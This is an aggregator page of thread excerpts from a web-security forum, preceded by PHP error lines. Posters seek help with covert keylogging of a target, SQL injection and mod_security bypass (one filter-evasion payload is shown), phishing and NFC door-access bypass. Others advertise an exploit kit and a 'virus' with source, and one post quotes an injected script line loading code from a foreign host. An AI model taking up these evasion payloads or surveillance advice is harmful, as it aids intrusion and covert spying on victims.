Warning: fwrite() expects parameter 1 to be resource, boolean given in /var/www/www.schuirink.net/www/xml/headlines.php on line 383

Warning: fclose() expects parameter 1 to be resource, boolean given in /var/www/www.schuirink.net/www/xml/headlines.php on line 384
sla.ckers.org @ the web & the world :: hundreds of fresh newsfeeds on schuirink.net
main destinations: home | the web & the world | out of here

news headlines

News headlines collected from 498 newsfeeds.

sla.ckers.org | The Web Application Security Forums

url: http://sla.ckers.org

Where do I download the Mac version of Ruby Version Manager (if there even is one)? (no replies)

So, I'm looking into downloading the Mac OS X version of BeEF, but I read that I need to install Ruby Version Manager in order to use it. I've Googled for that, but I can't seem to find a download link in any of the sites that talk about it. One of them is even titled "Download Ruby", but what I've just downloaded there has turned out to be a Unix application.

I don't have Unix, only Windows and Macintosh (and I'd prefer to use Mac), and I'd rather not spend money on a whole new operating system given how constantly short of funds I happen to be. Since Unix is also an operating system just like Mac OS X, what is the point of having a version of a program designed specifically for Mac if it requires the installation of a Unix Application? And yes, there does exist a Mac version, if the following pages is anything to go by:


Anything I should know about using a keylogger and what kind I should use? (3 replies)

Just found out about keyloggers yesterday. Sites that either try to promote them or objectively state how they work claim that they are untraceable and cannot be detected. However, I know that if I were to bring it up with anyone outside this forum, they'd only warn me about the risk I'd be running of being traced back should anyone actually do find out.

Since I use Mac OS X and would like not to spend money on any of these things, I had downloaded MacKeyLogger.dmg as of yesterday. However, if there are better ones I should look for in order to avoid detection by anyone, I'll be glad to hear from someone here.

Also, I know that they're supposed to operate in total stealth, but is it possible for a potential target to have software installed on their computer that would alert them should a keylogger be introduced to their machine?

Is there anything else I should know about this subject?

XSS Scanner BETA 1.1 (no replies)

XSS Scanner is a simple aplication that will search for common xss vulnerabilities in a site.

How to use:
1) Type a site with query parameter
2) Click on Send
3) Wait a few seconds, if a xss is found it will pop up an alert.

Note: Not all the xss available out there isn't include in this aplication because some of them will break the code nevertheless is a great app that cames in handy.


ZoneAlarm Antivirus - anti-spyware Scan Module (no replies)

This DOS application will detect if Zone Alarm is installed and perform a security scan using the scanning module of ZoneAlarm Antivirus.


Make a null in outlook/live/hotmail account (no replies)

This trick will hide the inbox emails in outlook/live/hotmail site.

Just login into an outlook account and paste the code below in the browser.


VEK - Vulnerability Exploit Kit PREVIEW RELEASE (1 reply)

Here is a PREVIEW RELEASE of what i have been doing in the past month.

VEK is a software that exploits vulnerabilities in various online scripts.
Basically what it does is give the user an interface where exploiting sites is very easy.
In two steps a user can exploit a forum, site or server.

MD5: DEC38F51D69A7FC6CE1245D8B80E647A

Download: (59,18 MB)

bypass & (1 reply)

hi bro...

i wanna inject a command to an url but i cannot becasue i cannot add "&" to the url. also i used "%26" instead of "&" but it was not accepted.
what can i do?

Proxy Browser BETA 1.1 - Surf the internet anonymously (no replies)

Proxy Browser is a windows application that will give you access to diferent proxy servers.

To use is quite simple:
1) Install the application
2) Run Proxy Browser
3) Type the address and navigate the net

For a new proxy, close the window and run Proxy Browser again

EXTRA: Updates are available by email privateloader@hotmail.com



Microsoft - Malware & Exploits (no replies)

And they say that Microsoft is not a malicious organization, lol?

Test this link

Proxy Browser - Surf the internet anonymously (no replies)

Proxy Browser is a windows application that will give you access to diferent proxy servers.

To use is quite simple:
1) Install the application
2) Run Proxy Browser
3) Type the address and surf the net

For a new proxy, close the window and run Proxy Browser again

EXTRA: Updates are available by email privateloader@hotmail.com



Acer E1-510 - Windows 8.1 Resources Booster (no replies)

Optimize your Acer E1-150 or any windows 8.1 operating system making it run even faster by closing native aplications.

->Note: Consider use Autoruns from Microsoft to disable them...



XSS Scanner BETA 1.0 (no replies)

This software will scan a site looking XSS vulnerabilities.
It easy to use it only requires that a user type the address + search parameter in order to scan.

The scan is clean and if a vulnerability pass throw, an alert will popup with a vuln number.
Check the source to get the XSS code...

Warning: This is a new project, the XSS database is a bit small.



sql injection error with string pass (no replies)

please can anyone explain me how to fix error to inject it


Sqli Injection Bypass (1 reply)

Hello ...

i have just a doubt please help

suppose we have 11 dynamic pages in a website like as

index.php?id=1 ( page ok )
index.php?id=2 ( page ok )
index.php?id=3 ( page ok )
index.php?id=4 ( page ok )
index.php?id=5 ( page ok )
index.php?id=6 ( page ok )
index.php?id=7 ( page ok )
index.php?id=8 ( page ok )
index.php?id=9 ( page ok )
index.php?id=10 ( page ok )
index.php?id=11 ( page ok )
index.php?id=12 ( Blank page no out put instantly )

security enabled : Mod_Security & comment escaped
mode security bypassed with /*!UNIunionON*/ ALL /*!SEselectLECT*/ but now the page shows same redirecting at single page suppose it 11th page
how can i bypass this security ?

i think injection is Time based Blind
Can i bypass such injections ??

[Virus] Windows 8 Resources Blocker + Source (no replies)

This is a virus for windows 8 and basically what it does is use the function taskkill to terminate common windows 8 executables.

1) It will close various executables.
2) The CPU will go 100% as it work in a loop.

Check the source for more details.



any usefull auto database? (no replies)


Does anyone knows of any usefull automotive database?

Hacked, cracked, etc

dom xss is possible ? (no replies)

dom xss is possible in ie browsers in code ?
<script language="JavaScript">
function onLoad() {
<body onload="onLoad()">

is located in http://grepcode.com/file/repo1.maven.org/maven2/org.zkoss.zk/zk/

in ie8 browser injection in url ');// error message zk undefined, bmk null or undefined.
How is reproduce injection dom xss ?

The sql injection (1 reply)

For this sql injection,how to bypass IT?



NFC Security (no replies)

Hi guys,
I was redirected here by a friend, to ask few question I hope this thread can be not a once reply topic but a section were we'll disscuss about security in NFC Tags and Readers.
He tried to anwser few of my questions but hope for another anwsers.

I'm a 20 year old student, and my as my homework I got NFC security.
Before I start, let me tell you about my equipment, own this device and a tag (actually 3, tag the paper, a key, and a card).

w w w. s8.postimg.org/aek39k2it/photo1.jpg

Now my "homework" is to find a security hole/try to break it/ in school where the system is setuped as that the tag reader identifys a tag by ID of the tag and if the tag is located in the database it allows access to the room.

I need to get into it without knowing any tags, actually I know the, but thats not the point.

~Can NFC Tag ID be changed or can it be controled by a script ?
~ If so how ?

~Can I bruteforce NFC reader using HCE NFC phone / device ?
~ If so how ?

~Does the reader that I have ACS.com.hk manifacture ACR122 Keep logs ?
(tried to find out but without success)

That is for beggining hope you guys will help me with my study, would appriciate it very much.

Identify base64 looking text (no replies)

while searching for injection points I came across a base64-type looking argument to id param. Can anyone help me identify what is it exacctly how to decode/encode it. It ain't base64, It tried decoding it.


Exploitable (no replies)

Hi guys can you give me the status of this parameter ?


edit smb_relay.rb (no replies)

I have been trying to figure out how to modify the smb_relay.rb metasploit module to use the same session that is created for uploading a payload to a share, and use it to download all files in the share to /tmp/loot has anyone done this before? any help would be much appreciated. Thank you.

Change user (2 replies)

Is it possible to change user using sql injection ?
So you can get privilages ?

Greetings (1 reply)

Hello all,
I'm an unprofessional pentester/blackhat for hire who's looking to share knowledge and expand my current social circle with other knowledgeable people in the field, power in numbers y'know?

It's a pity this forum looks slightly dead for the current time, I hope that will change.


injection alters javascript file (1 reply)

OK here's the dealio, I am asked to code a bookings page for a taxi firm I used to work for using PHP/mySQL. The owner won't pay much so I don't sanitize user input etc and generally do a half arsed job hoping, maybe, that i'll be asked back to do some more work on it and get paid more.
Well it kinda works out for me as some attacker manages to re-write an included javascript file so that it does this (appended to the included js file):
document.write('<script type="text/javascript" src="http://www.kyasshingu-shinsa-a1.asia/7nqth9gv.php?id=100737776"></script>');

So my question is this. How did he/she (the attacker) alter this file?
did they get the ftp password? if so how? what other avenues did/could they use to alter this file?

The js file only provided form validation, cvhecking if boxes were filled in etc.

P.S I won't be so negelectful in future even though I did get paid extra for sorting my own mess out!

Thanks for any insights in advance.

h! iam lggoloza (1 reply)

iam lggoloza from the china

be good at: Xss. linux Kernel driver. intranet penetration

Namaste! (1 reply)

Namaste, everyone,am new here,can anyone help me in Phishing!

another one (no replies)


i dont have permission ?_?

why this 400 bad request?? (5 replies)

order by and union all select works

but injections to retrieve data not^^ why?


i need to refresh my memory... (2 replies)

omg i need to remember some sqlinj^^